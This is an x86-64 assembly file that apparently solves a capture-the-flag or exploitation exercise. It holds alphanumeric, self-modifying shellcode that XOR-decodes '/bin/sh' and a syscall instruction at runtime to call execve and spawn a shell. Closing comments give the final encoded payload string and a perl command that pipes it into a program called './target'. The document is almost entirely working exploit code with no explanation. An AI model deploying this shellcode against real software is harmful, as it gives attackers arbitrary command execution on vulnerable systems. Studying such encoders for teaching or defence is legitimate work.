shellcode.s

	.global _start
	.text

_start:
	push $0x5a
	push %rsp
	pop %rcx
	pop %rax

	movslq 0x66(%rdx), %rsi
	xor %esi, 0x66(%rdx)
	push $0x3030474a
	pop %rax
	xor $0x30304245, %eax
	push %rax
	pop %rax
	xor %rax, 0x66(%rdx)

	movslq 0x24(%rcx), %rsi
	xor %esi, 0x24(%rcx)
	movslq 0x28(%rcx), %rsi
	xor %esi, 0x28(%rcx)


	movslq 0x24(%rcx), %rdi
	movslq 0x24(%rcx), %rsi
	push %rdi
	pop %rdx

	push $0x5a58555a
	pop %rax
	xor $0x34313775, %eax
	xor %eax, 0x24(%rcx)            

	push $0x6a51475a
	pop %rax
	xor $0x6a393475, %eax
	xor %eax, 0x28(%rcx)           
	xor 0x24(%rcx), %rdi          


	pop %rax
	push %rdi

	push $0x58
	movslq (%rcx), %rdi
	xor (%rcx), %rdi               
	pop %rax
	push %rsp
	xor (%rcx), %rdi
	xor $0x63, %al


# final payload: jZTYXHcrf1rfhJG00X5EB00PXH1BfHcq$1q$Hcq(1q(Hcy$Hcq$WZhZUXZX5u7141A$hZGQjX5u49j1A(H3y$XWjXHc9H39XTH394c
#command payload: (perl -e 'print "jZTYXHcrf1rfhJG00X5EB00PXH1BfHcq\$1q\u\$Hcq(1q(Hcy\$Hcq\$WZhZUXZX5u7141A\$hZGQjX5u49j1A(H3y\$XWjXHc9H39XTH394c\x00"';cat) | ./target